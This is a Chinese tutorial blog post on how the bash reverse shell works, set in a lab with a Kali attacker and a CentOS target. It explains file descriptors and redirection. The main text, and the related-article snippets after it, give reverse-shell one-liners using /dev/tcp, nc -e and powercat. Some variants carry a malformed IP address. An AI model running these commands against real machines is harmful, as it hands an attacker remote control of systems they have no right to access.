linux 反弹shell 教程,浅析Linux之bash反弹shell原理

最新推荐文章于 2024-09-10 20:38:52 发布
最新推荐文章于 2024-09-10 20:38:52 发布
阅读量476 收藏 2
点赞数 1
文章标签: linux 反弹shell 教程

环境

攻击机:kali            ip:192.168.25.144

靶    机:centos      ip:192.168.25.142

过程

kali 监听本地8888端口

6a01edd9a2945040aa452f45c8414eaf.png

靶机 centos 写入 反弹shell 的命令

bash -i >& /dev/tcp/192.168.25.144/8888 0>&1

8ec41a48b3f7ef8f6e2fc9880cf5aee4.png

攻击机 kali 成功反弹shell

156573c7ee99876b52872f498d7d952a.png

原理

反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其命令行的输入输出转到控制端,从而实现交互

我们将命令拆开

bash -i

/dev/tcp/192.168.25.144/8888

>& 0>&1

bash

Linux中一般默认的shell是bash,它功能几乎可以涵盖shell所具有的功能,所以一般的shell脚本都会指定它为执行路径

常用的shell有  ash、bash、dash、ksh、csh、zsh等,不同的shell都有自己的特点以及用途

查询当前shell命令 ls -l /bin/sh

1f24c28e0d3dde169d172b145763656d.png

20e712ce32c0ee7a2d062d3f2f0c0669.png

bash -i打开一个交互式的bash            shell 如果有 -i 参数,就是交互式的

交互的意思就是可以和用户进行交互,输入命令,回显给用户就是一个交互的过程,而执行一个shell脚本就是非交互的

使用命令 echo $-  可以查看是否是交互式shell

936fe6fc00f464bac6e058a0ab1bddb2.png

有参数 i ,是交互式的

执行一个shell脚本

c7aed021bb0223ecf1b1139fa79cb5ce.png

无参数i ,非交互式

/dev目录

dev是设备(device)的英文缩写。这里主要存放与设备(包括外设)有关的文件,Linux一切皆文件

/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/

/dev/tcp/192.168.25.144/8888

所以上述命令就是和192.168.25.144:8888建立TCP连接

文件描述符

Linux 系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,文件描述符就是内核为了高效管理已被打开的文件所创建的索引,用来指向被打开的文件。

所有执行I/O操作的系统调用都会通过文件描述符,即文件描述符可控制输入输出(输入/输出重定向)

标准输入(stdin):           代码为  0     使用 < 或 <

标准输出(stdout):         代码为  1     使用 > 或 >>          默认设备显示器

标准错误输出(stderr):  代码为   2    使用 2> 或 2>>      默认设备显示器

--- +--------+

( 0 ) ---->|dev/tty0| 当开启一个终端时 默认的文件描述符 指向 /dev/tty0(虚拟终端)

--- +--------+

--- +--------+

( 1 ) ---->|dev/tty0|

--- +--------+

--- +--------+

( 2 ) ---->|dev/tty0|

--- +--------+

大多数Linux 系统命令从你的终端接受输入并将所产生的输出发送回​​到您的终端。一个命令通常从一个叫标准输入的地方读取输入,默认情况下,这恰好是你的终端。同样,一个命令通常将其输出写入到标准输出,默认情况下,这也是你的终端

13a207215cf0166dc41ae41a3342636f.png

Shell 输入/输出重定向

我们让上图  输出重定向

使用1>将输出结果写入到 指定文件中    文件不存在则创建文件,文件如果存在会覆盖原文件内容

省略不写则默认就是 1       同理,输入重定向0

75eedbbebfbd161d7df3bd4e358a7675.png

e51d918b1ddefb01fa55f247ab187c53.png

使用 >>  会追内容在文件末尾

2c7dc68482166d7983d635836ada3ba3.png

结合上面建立的TCP连接

8c81c20090110865f729eb1d71c1d060.png

3ca4eec8c14e14bf24705977b01a5a8b.png

kali攻击机收到

3dfb10a4e91e492dd5b57f3dfd47312d.png

结合bash -i

9ae2a8717254ca42bec68bea2b7421dd.png

cf72f3e0816df8670d36bf955d1d03da.png

在kali得到命令执行结果的回显

42da255fe1503f6ca402ce016325cd80.png

此时我们输入name,可以看到,标准输出错误并未被重定向

3a5f9690b81d2b6ea9d5993b47b25270.png

--- +--------+

( 0 ) ---->|dev/tty0|

--- +--------+

--- +--------+ +------------------+

( 1 ) ---->|dev/tty0| ----> |/dev/tcp/host/port|

--- +--------+ +------------------+

--- +--------+

( 2 ) ---->|dev/tty0|

--- +--------+

输入重定向

9ae2a8717254ca42bec68bea2b7421dd.png

f9832c890c319dec9d05910e539641c9.png

在kali攻击机,输入

7bb6ca2be4a50687b1097cdde10a2c8c.png

靶机得到输入指令,标准输出(默认终端)

36fa998f39f836cc29e516e05e98d87f.png

--- +--------+

( 0 ) ---->|dev/tty0|

--- +--------+

--- +--------+ +------------------+

( 1 ) ---->|dev/tty0| ----> |/dev/tcp/host/port|

--- +--------+ +------------------+

--- +--------+

( 2 ) ---->|dev/tty0|

--- +--------+

!!!!!!!!!!!!!!!

此时,我们只需要将

bash i  > /dec/tcp/192.168.25.144/8888  和 bash i 

实现在攻击机 kali 输入 命令,在kali 机 得到命令回显,实现了反弹shell

即 使用下面的命令

bash -i > /dev/tcp/192.168.25.144/8888 0>&1

效果     kali   ip:192.168.25.140

eac629dfd4ba7559b9293c7e8b518fed.png

a3a925c8e1fce833c7f7236250278f3e.png

此时靶机会输出在攻击机所输入的命令,还有一个问题,标准错误输出 并没有重定向

458ce19a71ee12f9e4903cf6b03a5282.png

74d92f2527ad9b2055a9376ce4d04a60.png

补充:

bash 在执行一条指令的时候,首先会检查命令中存不存在重定向的符号,如果存在那么首先将文件描述符重定向,存在多个则从左往右依次执行

标准输出与标准错误输出重定向

此时反弹shell语句里边用到了>& 操作符,>& 操作符在不同情况下有不通的含义

在   >&word  语法中,当word是数字或 - 字符时,操作符 >&  表示复制 文件描述符

而文件描述符的复制格式有  num1&num2

这里两个都是将文件描述符 num1 复制到 num2 ,两者的区别是,前者是以只读的形式打开,后者是以写的形式打开

因此num1&num2 是等价的(读/写方式打开对其没有任何影响)

所以上述命令可以修改为     bash -i > /dev/tcp/192.168.25.144/8888 0

所以    0>&1  或者   0

是对文件描述符的拷贝,是将0[标准输入]重定向到了1[标准输出]指向的位置

此时1[标准输出]指向的是socket连接文件(第一个  >   ),

重定向完成后,0[标准输入]也指向了socket连接文件,所以我推测因为拷贝,所以原标准输出回显到靶机上(kali上敲的命  令)

--- +--------+

( 0 ) ---->|dev/tty0|\

--- +--------+ \

\

--- +--------+ ----> +------------------+

( 1 ) ---->|dev/tty0| ----> |/dev/tcp/host/port|

--- +--------+ +------------------+

--- +--------+

( 2 ) ---->|dev/tty0|

--- +--------+

此时标准错误输出 依然未曾改变

在  >&word  语法中,当word不是数字或- 字符时   >&表示将标准错误输出合并到标准输出中

此时与操作符   &> 功能一样     >&word 等价于 &> word       都相当于        > word 2>&1

当执行bash -i  > /dev/tcp/192.168.25.140/9999 0>&1 命令时,效果如下 标准输出错误并未被重定向

3a5f9690b81d2b6ea9d5993b47b25270.png

所以我们执行命令   bash -i  > /dev/tcp/192.168.25.140/9999 0>&1 2>&1   或

bash -i  >& /dev/tcp/192.168.25.140/9999 0>&1       均形成了一个闭合的回路  ,同样,命令回显到攻击机上

da6e7a22fcfa4e9cf2e2d1c837105309.png

实现以下效果形成闭合,即可反弹shell ,而其他一些反弹命令,只要可以形成如下效果即可

--- +--------+

( 0 ) ---->|dev/tty0|\

--- +--------+ \

\

--- +--------+ ----> +------------------+

( 1 ) ---->|dev/tty0| ----> |/dev/tcp/host/port|

--- +--------+ ----> +------------------+

/

--- +--------+ /

( 2 ) ---->|dev/tty0| /

--- +--------+

bash -i >& /dev/tcp/192.168.146.25.144/8888

bash -i >& /dev/tcp/192.168.146.25.144/8888

bash -i >& /dev/tcp/192.168.146.25.144/8888 0

bash -i >& /dev/tcp/192.168.146.25.144/8888 0

bash -i >& /dev/tcp/192.168.146.25.144/8888 0>&1

bash -i >& /dev/tcp/192.168.146.25.144/8888 0>&2

bash -i > /dev/tcp/192.168.25.144/8888 0>&1 2>&1

本文借鉴了很多大佬的博客,如有更正的地方。还望指出

参考链接:

到此这篇关于浅析Linux之bash反弹shell原理的文章就介绍到这了,更多相关Linux bash反弹shell内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

慕容隽
关注
反弹shell方法
Cwillchris的博客
05-04 661
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹
linux反弹shell原理浅析
黑锤的博客
08-14 799
反弹shell文件描述符与重定向 在这里最难理解的就是文件描述符和重定向这两部分 先来讲一下linux的文件描述符,什么是文件描述符, 在linux系统中将所有设备都当做文件来处理,而linux文件描述符用来标识每个文件对象,在我理解中就是描述符用来指定对象的,这样才能井然有序的运行。在linux系统中就连输入设备和输出设备都被当成是文件来处理就拿显示器和键盘输入都拿来当成文件处理,他们都有...
反弹shell方法汇总
2301_76786857的博客
01-10 2130
reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
内网安全:反弹shell
最新发布
8888的博客
09-10 1562
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2。powercat -c 攻击机器IP -p 9999 -v -ep。
反弹shell汇总(超详细)
人无名,便可潜心练剑。
05-27 1万+
反弹shell姿势大全,看这一篇就够啦~
反弹shell
weixin_39430198的博客
03-09 1万+
一、课时目标 1.理解shell的概念 2.理解交互式shell和非交互式shell的区别 3.掌握反弹shell原理和方法
浅析Linuxbash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
浅析shell脚本知识之符号篇
09-15
Shell脚本是Linux系统中广泛使用的自动化工具,它允许用户编写一系列命令,形成批处理脚本,以便一次性执行。在Shell脚本中,符号扮演着至关重要的角色,它们提供了指令控制、变量操作以及与其他程序交互的能力。 ...
反弹shell学习(一):基础反弹姿势
E1even的博客
07-25 2174
文章目录bash反弹:nc反弹:-e被阉割的情况:nc -e:利用Telnet反弹shell方法1:方法2:python脚本反弹:PHP反弹shell总结: bash反弹: 这是最常见也是最简单的一种反弹shell的方式,直接看命令: 攻击机:nc -lvp 2333 受害机:bash -i >& /dev/tcp/192.168.28.133/2333 0>&1 攻击机: 受害机: 最后攻击机达成的效果: 可以命令执行,再实际中不可能获取的是root权限,所以成功反弹s
反弹Shell的基本操作
weixin_46831054的博客
11-26 1039
反弹shell定义: 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连
反弹Shell的方式和详解
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
渗透测试/反弹shell
dkpower111的博客
02-02 309
Linux下的反弹shell 1、什么是反弹shell 就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 2、反弹shell的原因 通常用于被控端因防火墙受限、权限不足、端口被占用等情形 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web
各种反弹shell方式
m0_58606546的博客
11-17 2331
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
什么是反弹 Shell
静觅
04-17 2055
这是「进击的Coder」的第605篇技术分享前段时间被一位产品经理嘲笑了,说我居然连反弹 Shell 都不知道!说实话当时我还真不知道,但这口气咽不下去啊,得赶紧学来看看,这不,我已经学会了!学完之后我特地来记录下,同时分享给大家,以后产品经理再也不敢嘲笑我们不懂反弹 Shell 了!什么是反弹 Shell我们都知道 Shell 的概念吧,简单来说,Shell 就是实...
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 5222
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值